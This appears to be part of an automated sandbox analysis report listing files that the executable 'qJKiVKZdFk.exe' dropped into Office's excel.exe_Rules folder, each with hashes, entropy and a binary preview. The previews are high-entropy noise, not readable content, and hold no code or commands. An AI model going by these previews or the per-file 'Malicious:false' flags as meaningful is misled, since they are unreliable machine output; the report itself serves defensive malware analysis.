                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1384
                                                                                                                                      Entropy (8bit):7.822031240980007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:PuKaP/XT8vn4j5lrt5zgUMpMkFfKmp6YkUABfZEUFExbD:4Tbjnp3oMkFF6YkUABfZjahD
                                                                                                                                      MD5:9776B9FFD955E75E0DFFA857F905FCF8
                                                                                                                                      SHA1:E3758043A671318950AD3DE17932AA4F3D4141F9
                                                                                                                                      SHA-256:8216461875FD9F7BEE5B8B9495FE7DB25AD0BDADB4E445F153DB2729EFF72620
                                                                                                                                      SHA-512:B0ED6B4A70002EE7C5562BF942437BC58CBA78D93C76395B8D6C28145FB4BCA1828A9DE9337E36C74E3EA40CD50DDF29DCA1CE905D9025BD0C7039C64D5D3763
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml*y.T.Z.-cdrKws...8S|...&:.^b...>. 6T}.6tl.....8.}xK;..VmFd&a...8...u".n...........O.(.,V&.*.;h..9:.e.@>}....'Q...p.....2.....Z...v..vxs6$.....1....K.um..Ec<..U..,.k..h5....hL./.y.k....,.E0.o.F$.s.....^<.eX^......HA..w..Z...L..H.F..`g{"..,:):...@..U....2..t.ULGo...I..~..S....<.0k..I<..=l.K...U..kj...F.t..^T.g..... ^.N)F...p..}...2.(........:....y}.@].;.#...4...S.....Bn....G._.#.f.H......J%...a.D...V|..2~Y...a..to<...).5.$u.7......&A...<........$.........NOyr.....q.D.[..o..,.p-H.E....k.....[n0..3..iC-8._%.H.......R....a....G.N.%....3s}D..J.4..)..........P.GIV..e.6@.........(.d.^....^.0.*.VJ;L....`/...*..WHJ....O.....9$.@4'r[..eor.0%uV+..7..D[08...}...d.J+.3.a...>....'I.G....E..*..T.N.9...$pv&..c...h~.G..4.@...j..Y..GS.%i'..B..$s.!....Z...x..".J....\...-`......r*q..T...!g..-.Y7.S.....`x....Ci/v.........._....h....5$:..$.rS...p./[.@.....N...SgQ.M......Q.\d1h|B..'......5<..e....du[E..X.QE..x.U.-...@...,...x..6.....L..#..c....k:.r.Y.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180065v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1772
                                                                                                                                      Entropy (8bit):7.902185153282852
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:F9iGcdxpJLivjgoWxYWS5DJDWbQXgFRnGVXD:F9xA9i8Rqrd10nmT
                                                                                                                                      MD5:ECC32F307695DDD05A4F65042F2E1EA0
                                                                                                                                      SHA1:5EE4EB1EB72F8D6AA4DB4474E62D1C0BFB7D3ED4
                                                                                                                                      SHA-256:D690495ABCEDE38F6F2FD2D200B0B051C50EFFCE65E36E3995F47A27A4779B68
                                                                                                                                      SHA-512:393CFFAF2CEAE599C72FD4237121642BA4AC7BB1D0A0765F243DB322315A3DA60ACEAF74399D16FCFEE6B4173F4A8E3A68A786561896175237FA8FB08AE3FCE7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..q.,<..........XN..E..P.....V..M.....i.....S....u{.....on.1@ka....u..).'=...=..@.(7xK).X.G3.o......O..(P..B..l.]...4.F|..9tD..*acd&...W.j%IR...:..W.......y....gM...........A.....C....e...b%*h....f`I.L.....?U..Q..~n.V8......n...u...u+..L`.]-X..(#g....}?.0Q...7.....#.jX`..`...]+.!....;&;.'...p.......&.BDcF....;...j.n.H*qn^Y...@..vO.#.u...AIa.."...n.E<.^.........|..l[..6.........v....Z..mC..JB6.7.d..Py..8..bb....h..C,(B.w.)~.ICP{?A%c.O"...2.m4.f..I.K..*c*$.4.....s?....rgj.x[e.p.......{....:..T^..Q4.@-.(G&Bp.m..c....Or).Y..[....l..$U.`.%z.x.....[.m.$..(...d.....w....t.......B....A[.R..w....IV..`.......Ka.;~h~8.V...Z..|.jH.M?......|.;......O(./\.c..X6l..l. R.-G..q...Y...f...O...$.KxOI.4a.Y.l.....S...a..Vb}+...G.D.].B...3...VW#h.*...cV.C]0b..G0.E.n..........Q...pl..B.....W....)..'.0.^......xs..=o...N..S.W.c...,..z.V.........5(..H....H...]5Q....1.C......gG.H..Qk..oZ.[..f..R.......7.18..W..x......./....gP.N..{...=;RY....+...z......PK...=....1..8..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180066v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1478
                                                                                                                                      Entropy (8bit):7.873740290167756
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:La+bg2Yav6DfaI68arYYbHKis7mJysgKA2mBqAL55JIt59OGR9puWe27RbD:La+bg2YaW5qsYHK1igb2EqAL459O+9p/
                                                                                                                                      MD5:1A022545EAB53D5AA8FA29FEF7DF8D26
                                                                                                                                      SHA1:5333004196DE32D2CEED54BABB06832DC4E0A523
                                                                                                                                      SHA-256:D8970B9D3F77FD487C50206802FE202D925FEEC36C54BDD5BAEF6286B4A4E607
                                                                                                                                      SHA-512:43FC688C609D3700FF69B5D8C5EC499E8EBCB794468F8F104366163AB0A76DF7C2E3FDBFFAD0EE726C65C8C9B37040A0B67D4E6BAF8F2B54933EDA77E8CF6A3E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......[.Z\..CK<.~..bz.ZA.......+.:..._Q...8..y........F..>|.....5;9T..y+.|.7X....D$f.0.[..0.H.......Y..>.GM..(.......;M,.l.....Hz.1..y.>...h.EY.#..4...y...0W4...k..z.......@.|..z...+.c.\...G.......}...D....H..-...<1#Ro.~.i...o......^.}....mp@.....A.......@G....B.Z.8..7....0y....w..v...n..X..m^B....[5....%....16..1D.....W.w.....b....S.A..Eq..vV.....Y\D2.......Z....s.."....5}L..P...\a.w.xq.P`k.x+.)O.....?((.o..'.V.s-..^EB..f'...j.......).G!...U+...'..9Ri.D.....C..YNm*W........+...y)i."....c.a.9.......SS.W(T........H`.1.p..$./p1.6.H.U.V..z..q.!..,.v.z[T....R..F...A.k../...#.`...}...8.Q.~...{.1....5l...t..v/]..w3.6o..}p.7..%.e...L..ld\.u.vS..:..>T..s.q.q.......g.. ..8J...."+.<j..{..k.D...>.6.......}_..w..U........z.../1K[.IM..H....2...K.Ux..s..k%..1F...b.v..|.`..R...A.b.C..d..{c.D.G.:e.jy.~0.`.^. I.&.\~...o..L.'*J..b...T.O..Ql.N.....Y\ K..Ic..d.p...{.o.S...&..)...aD..f-...e..gMZKD)bYW..'..3....-.....I...{.\.fN.ti..h....(L./.,...2.(..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180072v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1565
                                                                                                                                      Entropy (8bit):7.884583474261454
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:nFy3Jdkb8zOFBWeVNo9PS9zNfPvPNgKAccMv48cjRUfR0RlzL16qjsbD:nM5dkb8z2CZYnXAhMA8cjRU2D1JjmD
                                                                                                                                      MD5:F28770ADBEDE566A93F17E6C710EA58A
                                                                                                                                      SHA1:4FCB1E496890FA16564ADA33F04A72A7B3C27C09
                                                                                                                                      SHA-256:664E357B9196E1158ABADE506AD90202F2B196CC5E473955FCDD86F79AD92F48
                                                                                                                                      SHA-512:F6B03076D86C9FA79CDF53C8770D563E154C81DD656D801DCF53F2AD371A7894DD7571250B865297DF827D2B41F800C306031EAEE1051A4DDDD40403C3EDD7C6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.........B./.eQ.x.0.5n...sm.B....t\...%..~v3.....KS=f.W...?K;..3e...0fJ.../..%"..&..*........O.q6a..U.nM.6....b:.Q.....+.[|[E|..D.;........^B...?J.{.J.......0.v.S1"b.r....x.(..8.T...8..zjM..A .B..v.H...1..^..<.K.\.VI}.I...8'......oY......a.....:.,....`..o..w.mvA...G.L..=Kh.Xba.H...y../{7...,.......Uh:(..].+......&...V,..L.....z&.[.5....C...........R..C...I....W_.@..k.....yp.....)XoO.5Pu....&!.......$...%/....cL.UE..p..:p.].yR-..........Z.....44..!..>..4......'.P[.T/....8....Q..2cT.58.....X.........2..7..r..R.m.cn^.5_-.....#X\...k.j..4zH.8.h.R.p.(.........Gr.+.!H.1....A.....0.....}.+.`.`>N+r.=4c...:...a..@.....0..f|..=u._....9.i=w.......ZX..Kp.$..I.(..d....%....0...j...........L....)$.x...."oLP<,n..o..mN..."#"{.......dy..d.z.W.g4.$l...=Ou...|..iW...Q@.t.T<..4Q.$....f;.,'.'........j.<L...........^.m..W.*......RDhJ...A`.L....e...T.|....#.R.n...:h|..+..7.\E...A\...Xo.g..n3...4....hy.(3..Ec..@r..D...-..>.....{^..z....oOK.H..-

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180077v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1793
                                                                                                                                      Entropy (8bit):7.89115951922096
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:G4wkZY2FumEUbHmQbm4nEZuuCPjt5fmo1XchvgAK/iGODVdfmz/hl9FjRllUvKsC:GwFFzbHbtPjuBgABGOBdEDRkybygD
                                                                                                                                      MD5:7C54829B58B6EAF092C67593A8EFBCC9
                                                                                                                                      SHA1:CB65775A0A4F425207A4F4AD6BEDDE9163D1E28D
                                                                                                                                      SHA-256:C8D22DABC30D531D1F56D5A361B20CEADA6981D2D38802B7AEAF3888066248C8
                                                                                                                                      SHA-512:298CEDC2DD6053BD7BCA4F2750C28F3160482B915445168AFCA313BD96010211A0999E25B4CC5A381763E4B2C631EB3788E9824865662303ED73A91C907F1570
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...$.!.H/..X\k9h./F...A.....U.mE.gS.;.....K..DQ...4r.N..FaTU....\..[.,S............}7....r.h.T..fB...7....j.......y[i.\!(\..A.....8..Z....*...x..](...f.........w.+....[.{.Y.F\n..%..h(..c.......w9._........k...|........Rz8.W5.-2..JN.x..$....%.../3.#7..`dz.Z..t{..B.O..n...#...#._....e@...c...LM.[ux.........sE:..P.B..cp..;g....V`.+\j...|o....@C/Z...Bf.HV...,B...\.?[..f5.....N.}.f.2..[hSl.;...y..3T..kc@..W..2..-.R7.>.%.A.o.....]Yu.t.b..B.....a../..ea:......8E...{..U<.A>......K.;On^,\._.z.u.8....{.0#|X....)..\g..=U.....r.q.@......!8.{.....q..1r\..o...k.IV.[..\.r...[..C..US....!...#)...<..k.\J.{<...u.Ro~.i...`..*..X..yC...].......YT...%..u.....>?.H+FE...6.+...9....DI6..BJ...j.....r..x.}.=..0...u?.....3"...bo...(...&.&.B...?L...LX[......$...Jb.c(G.i.Q.......9yG...'.H>..Q...{.k....".....X......RIL.w(.<{...o6g,.M.80..'.#..onn.2_.)_.M.m..!p...0.....}&.qBS...........A.....V_;....4h....\.. .r...=....Q6..e.4%.......3..._Y.......s.<.......t=}..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180078v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1728
                                                                                                                                      Entropy (8bit):7.889276000857704
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:QmvP7Q4smGbNUA46bUkLs0n/4ZPVvWE32vkY0D:Qy7Q4smcNK6bN4raZg
                                                                                                                                      MD5:8F8DB9099FB95B4F3DD265F0397ECE26
                                                                                                                                      SHA1:1C24FF137684226E132CDE17B50004A58D296556
                                                                                                                                      SHA-256:7B19132F68BC3390AE4FF65BB0FE6473058046447AEECBDBB4285D16A4530741
                                                                                                                                      SHA-512:D6A2907578077F4A35EBED80AF9179D4A6E346B430902F9CCF229396FE98DFCC7A0A552604019A53BFA91A3138EA651F869026BC8460968D9A6C011D19B8A35C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml[.n._.x.vD..w..M."...%.T.({...?X.A.......9..+...,.N.........J.C...<.^cB.+....~^.=..@..U...'p....J...s[.z.w?.B..z...J..t....a.>..:_B...v{i...w.S...*s=....B;.4...Xw.....E..'.c{'.b.s1.qPk?{..]2...h../...pOj]..Yl.".V..s.%.<....T..B.............F..;.)0;(... ..>.?W.i.o...u.CL.T.....rA8..5.Y...[.........*=.b.O.8]o.."..7..n.uY...&Y.....-r.......8c.d.I4=tOf3....CY..QJ.j$y*...X.=.8l.A......P.....X..N.."..>.....#.?.....?FT{w.D....j..s.........wR............lTrZ.\.4.D....r.?.%..~.a..I.......4.H.....B...V.\S.@V...l$..x...\...j..j.......kr..4).M[..EY......4E,]...............Tn.~.....y...!.`.... .F....b.....QI..:.5(..\.Wm.,..{..,.}@......8.u.).=.|.C.-.b....O..A.....C.)...E..Vm.P...sb.P{...,.F..a.#.V..0Gss.v.[7.x..&..0.M..1....(.9]U.R....i..:..b+."..D.Xn..R.I.......28H......^...;....!..Lz..Z|...2XU..T..9...~.L^s.1....y.xs.6h,.ee...,.....A..N...{.hn.L.....fU".X].l..<Y..0......%...T.~..Ez......Z^q.....Y.f'dH{.....N.y$&..>....f....=k....b.....U.d.H..kj....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180079v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1461
                                                                                                                                      Entropy (8bit):7.845705212386954
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:+KEgz/lBJ+8JGkq815cHMVpwNT0yw3LckXnxbD:JEgv9FKMVpw6yJkXhD
                                                                                                                                      MD5:D61CC1388B2EEC67298A7651B7BC59E9
                                                                                                                                      SHA1:545965264FE89F9D09A6DFA95588B6B36F42DC74
                                                                                                                                      SHA-256:4D361501012505D6205C38EE7E7C49DDA2F02BD07B69AC7B3DA979C7BA29764E
                                                                                                                                      SHA-512:0A4198BCFA64EB900DDF6DA82E38F28DAF44708BE17813E706812F6B08E8501140AFC45103286E929EA3527526FBC2583C6CF56D8C7BAB0642F9AC75C9685854
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlo.:..J.z.~8.>...3...Y..!BE..%.[.h.E..v..*.T...;.!@".51../\.......S.$.."..a<O.S.+..j...^{.....^.{........R.....1....^.h.4.K.v...-.6..........Z...+.T..U#5.h....R.M.#...............:_...W.0......7....F.^.L.sN...,...."..{l..HA..<.^.Y...IAn..97...|s}....;..nQAm..ArI..j.E..o7@.........V....T...r*..d.u.C..9D.9............8I`Z"...S..fJ.*f..7....|.B>..2.....){5..fS.)=.1.f6..6....N..y.%.....B..=#V_w6&)8.9..Y.O......W..1a....m9.....Q..$..A....n4.5....a.0.u..g..j.l....@.%..T.x3.,.....=....g..gB...s..J...c=..) .fJ~X`/.zI....(n7.c.Aa...oZ..}.[6Tk..N.CI...^.L..........r...;R.%.......@.,."Xu....r.$Kg8..v....J^s.Zq.&.#,~fE..R....Mo....z...........H+.'UfY....M..Lz...pD.t.......U.|......p..8Im.......A.......=...|,EBo.L.Q...Z..b]Q.....4`C(n..O.1..u{._...=....N.).~..f...zo..8,.HO.].w.a.W...1.....+9...a........(.nK.uS7.]@w~.i0..k.Z ......;K.........QI.W..r/M..X..t.{..T.@'...zs6.F..n..5..O..B.$....;Fy...r..v..j.T.qz.i.~h...}nM...o>..x0..!.i..m....I.6

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180080v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1121
                                                                                                                                      Entropy (8bit):7.8147189681953435
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:IHsayfJaJtr76DOegtrVo0uvz/3SJIn633NFlxdOaLxbD:Es5wJtH6SXAbSeU9/L5D
                                                                                                                                      MD5:77A685A1593EDF6246A7459329B6507F
                                                                                                                                      SHA1:A2F5CAEC2392C26A3999A6E277837523895FC5F3
                                                                                                                                      SHA-256:1E49D97143F3FCC4F5A9A41C27A02092F8964D184011255124AEBAC13C0EDCDE
                                                                                                                                      SHA-512:9E724A3AAEAF72387AECED6360363BB27AE31E8E47E3FCCCF6FB1DAEF645B2D3D4AD8B53C89DE5624C792BF7E1A0FAA45E2F52FA125599D227B72458B635A7BE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml5........C..*X...^|.........y....k.B*.....$...l&..g..h...^...[.8.x......[.....t........6'...."s.1...$..?.......ov.U6MJ.t?..).#.W.p7p..!,.......Cr.....Y.Ex.`.|U.......~.A./..{/.....@!(. EA<..=f..hq.e.e...r.q-.....R....>.H.<3b...Y.a.."S|..&.@....=.71.%u...dv.*g..r....l.....)..J.....C.....V......V..L....i...6....P...m..N{.B8.......4...G~.HO:&.kF}.;9..............n..(.Y..d...f..{.^.4...5...g..[..h.k......J.....u(.z..rrPQ}.y.K.W(.CD\.GJ..........Z..-...J........~....].E.E4Q!.a..J..AC.Y.w7.cy...v..S .I.5F.h.uo]/..g..9e......@%5.A.."S.F.......V.XK7......&j......{.^c...cN.jj.S.(..+j..I...,...&..6x.m.`....N.{:......N.K.&...Y..Z.:..`.....7=.Z....8.2.s>..G.I.t.[G8.-.?s.a&..r.!.....k........?mf..L0A.E.HuB..(.S(....x....n......#t*...!1.r.YD...).@.....7.^.CM@..kR..........;._....-.......U....U.c...%._0u%X.....h"#%..X!..7.P...WZ.7.......U...P'.n..%..+.b.I0v....a.g.[W....yd..#y.R..re.j...c%8.tk...1K....JeY.*.sS4....D:.0o&.Sq;.d+Y..e.7.....DE`.p.>..V...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180084v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1393
                                                                                                                                      Entropy (8bit):7.840389984580288
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:UKKSC+Xy2XTBAM1FgST5vopmVaTzkACeEpDRTQiPlyr8SVOPQ7ESZbz7UbD:B9C+C2XTqYgIt94CeERVarVVOYZ+D
                                                                                                                                      MD5:A72603FBD86039B4796746F1B71BC003
                                                                                                                                      SHA1:CC3FEFA99B5876D9CDE1181C384CEF4BA8112803
                                                                                                                                      SHA-256:4EDC8B8101582C4289C971E83D0CEC2210B4B0FD36AF2BF7821FA69DC4337254
                                                                                                                                      SHA-512:FE877019692FF3706102C4CA56C4E2FB207B64CE882BB3581C6D98BDEC3D03208865119C648F2831A43AA9770D41518EBC68DA0B752CF3A39E65B211704E5322
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.BF..l/.dY>.......Q.me.A*mN.`R.I....5.......N.l.&.w#..../!.M.K..X%..>..d..7...D..*.."....6.v....s..Eu......s...._.@..T...'}...<.HD..2..W..........?j6dgF..[..y..gVdF..T..I*e.U.`.+..e"'.=....f..u...e.....{.1.....A..W@...%].@...f....Fd..j.K.G0..d.Y...J.f.?.Q/v.I.9...V[.IL...]...y:.3.4.u2...EH.=.r....v.q.dn.#Br..;[..T0.T.i.'.O@..o,(....b[........U..E41..n...<.z>.._xS.M.v.eL.p...01R..........Fu...+0.C..}.T...]].....)V.'B.b..K......6*.d.0.mL..F..0..y(i.....~.k..x0.v.4b.....#ET.G.'..0..+.U.~. ..I/...p:...<gvq..}.`..z~x..U..[.Db%...s<g...N_9.1..Q.%*......gm9...1...]..J.V.|.y....)..&.w.j...o....-....LW)wz.)..J...H:.*.q5c...p.~?.-...v.~:...C.l...m...b..b......;.@..8.@<...Q..k..b.t6j.|j........=.v.-..r..*...9t..q5.,.~...6.g$&..j..X>...3 ..;`5i...U....UF..UDh\w._...7rx..3..#Uk.....);...H..V..pz#1W....GG...._.......h5..|.3r....<t..ezc.Yodg..o.[9C...586VM./.b.....#.1c...9....i.[..O.9x..!..&%4.v....g....>...-....&.,b.".J.IB...S......p...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180087v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):702
                                                                                                                                      Entropy (8bit):7.704966283181449
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Og6cqSe+HGBYm5zzICVSRSUg30QOAr7sBg+CXPukIcii9a:/fqSpmBY+3q6x8Bg+CEbD
                                                                                                                                      MD5:FAE4CC5255713140637BBE9628EBAEEF
                                                                                                                                      SHA1:6B2738DF6CEFB48BAE72C51E19C18A9276986D9C
                                                                                                                                      SHA-256:B0B9F27727DD712C903243E1E596EDDA269933EF94979C22A3BC3D4FE8E84690
                                                                                                                                      SHA-512:14AC1A847339C906C5E715054D1B6C394BB0CC9BB652A40A5105AB0D47090E0860676FE4DE1CF503D82214B086CAEB6B040A6D65AEBEC23A92FB9F223E68F63E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......z.AR1q.b..$.#....n.....rK../G.....o!.....B.d...f........xC.J..|.....Z.g.n.>.XH9d.S..q~..~. ..)7........M....s..0.]!.....FeJ7.e:..s..6..R..[....R3.._5T~.H4.......m1SW....J&.%.$.$.....G./..9......r...F8&l......8r.o.(&;?..{.,ho...(#....u..&.{k.4sV@./...?T.N.....*5....x..P...v<......4.o...>..:~u..9s|.Z.X..CB.....d.......6.X......Z..........vF6.,..s.ZZ...&1;.X..N.w.. .S.........M.#......u]..af.I%W.ViS.....D...".....g.Tp..PE.........0.....b..e.:..+3C...[..p.Gn....7...U...^...i.|..c.:rZ.siT......|p...OF.Z\.;.A7.f.3.......\.B]Ba...f..).@....p....hp*...z...t2...,.0.y..`.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180135v4.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2212
                                                                                                                                      Entropy (8bit):7.915345927921507
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:E+gpdS89xUyLrlmUEifp7HSpd5Of9xAfSx0sH9aRC1QQdQbCD:YSyeyjpDSbcf9wSxn991ndwK
                                                                                                                                      MD5:47388DABCD246609149F4C5E8A572951
                                                                                                                                      SHA1:9B7ADC101CB88A356CF8825C53AEE0DA797E0EDB
                                                                                                                                      SHA-256:FC6C02F3A0679E49BF18571853D2731A919E49A4F4D540D4D88FDC1AAC04E606
                                                                                                                                      SHA-512:4707CBA11C7989C190C02E38AB615F0A19ECE82E441AFD78539869F0E98974EFB38E0352141B89C50B4E0252EEE060C09DEC1A309C8F98DFB26191FC3F28109C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlf......U<...j......[.....E.\..u.P...J0-..-...-Q.]&..&".w.r..A.u.....x...q........+.*...r....lc1...............w<.R...2.|.5.....X1..6, ..4.J99XP. S.u.l...#[....I.C+..'.F.6.X>..d!..%...2..>.."=j.....v.O....q....g^)KT.Y.Jl4N..}}...~..Z...eMY...F....i}.?........<....w.A..S..H#J...yC..Q...4..I....OZy.VE...Gd....+..6.@..n..........kn.}t..8.q....#.j.=H..T.[......m2%..s........U...ET\....y:..Z.1..|.(....'XWF..T.....3..JM...#.BY.a.r.........`........,..#.y7.....s!.sd...m,.TI....PU'".VU.IH.......S....`q-..N...Io!0...u6..8.8._=9%Rp..E...-V.I..f.T=.G0.....K....s....T..a.~...2.&...L....P.4.pQe'...!..X..6'_h.\.W.[.s>..Os0r.>..0.\w@....hE#.`.P....Pw.."pA..f....3i6B.A..Neu..g........xeU+..S.]...Yu.I.<+..I.g.....{M......$;.K.yr.f2.*P).o...b"*n8.>N.m.1...v.=\.r\4.6.....F.SOs... .....+7..r...Uz9%044...%dp..C.`....I.....d... ...6..Hy....5..%....g.!=4:1..N....V....0#-p0m..../7..O...2...o.n.f.iM.c.'....Y.`m.|.O..f...W.xT....y....i.....L...}^{.....N

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180136v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3315
                                                                                                                                      Entropy (8bit):7.939028226455938
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:tzP9+wQDDWO8an5ISAeBHhG79cXPmZeVm5eM/q:FNGDZnLlBHhG79cXP1M8M/q
                                                                                                                                      MD5:104614A8695EABBE230D9F275C2052ED
                                                                                                                                      SHA1:79EF28B6871A3A75B36A8E709247921C0FE8787D
                                                                                                                                      SHA-256:10198C966ABCE446294D957E8C836BEAE3FBEB49060F25E1F2B232240015D36D
                                                                                                                                      SHA-512:68E33B58EFC3A894AB5816A5DB2B1C66BABF80E4626BCF4BC77FFB35DE418092A2F774B2F1F61E7D39757803A1CEB784097DDBD7BEC020F2AF7FF271C072D9A4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.O.X.....].6..&.>q.4.t|[|^.....~K.fTTK0V. _.f...#...s......j.Wx..X....;.....xh...@...s..#.P...cD..*.H+..W..Q.....1O>.D6\......nd..a.w.:-m0.,.KV>.pltA...]mO..`pN.u..5...j..I$.......#tWm..38....-Sp.|Fr....K.........^..r......Rv...&W.V..G...}X`..y.-QX...FY[s...^..n......%.s*......k..O.0s.2$[......T.FI.e4......7#..UAW7...._/.+1..- .,;.-S.4..}5..]....R.=I.]Km\C^L..`B....<...9.3..p..G.#(5.2.........uo..t..+9....n..2.W.~.$..^@.._...>.....=....i.|...A.W.......W.;..D.?..fDV.m7.PdB.F.U@\.zy.d...+....D='6.........\..`Uf\...3...)]/..-.t.9.y.\K6Q.O.Xy"E3..[.U..c..{..G......1.l._.l>Q7.z...F.k.-...F.|..X.Q..K.4./...\./C..j...J.k.........+....e{U'0....$$;+.Qjj..w..M....;.p.oq.L...shE........)..W.n.:1..p'.{.-Ax.....p.B...1...6p.4..;3...9Tq.8..&./tW.O.U.~=IR..'.......,5R.....Y.....l.[[....n.......N.J.!aI.5......<........w&u...z.p.....?~...(B.,.h..\.|.y.)I........H.o...=.....2.7..B x{.N...B..`..j..+.)L.>..-..=E&_l...^f..Dh.w.7..r%5.j.J.gJ.H.........}..=2...j`8!

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180143v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1425
                                                                                                                                      Entropy (8bit):7.847542381397545
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:lkW0wNbUivakZba9e5YV7g34I5fRjNzbSxlAOPWM8vI0LLUJtbD:lEwN4gL5Ye4a5jNPAYvIk0ND
                                                                                                                                      MD5:1F455F2A9C086D22EEE1ACE242CAB40B
                                                                                                                                      SHA1:2412350C4D38210B60B09422122B95FECF04E22C
                                                                                                                                      SHA-256:218D4E1FDD16CC243E9FA7D46B2EA3E69E7D897F1E3222BD3726D797182361A4
                                                                                                                                      SHA-512:B5090846C9CB7BE5C99F5ABA2C6894F59B8BEEF563775F84CD13FC3CA8F941932205EED4923721A48CAC2B8C3CF451F1980B5E6B127040E8BFA0514283FF4E43
                                                                                                                                      Malicious:false
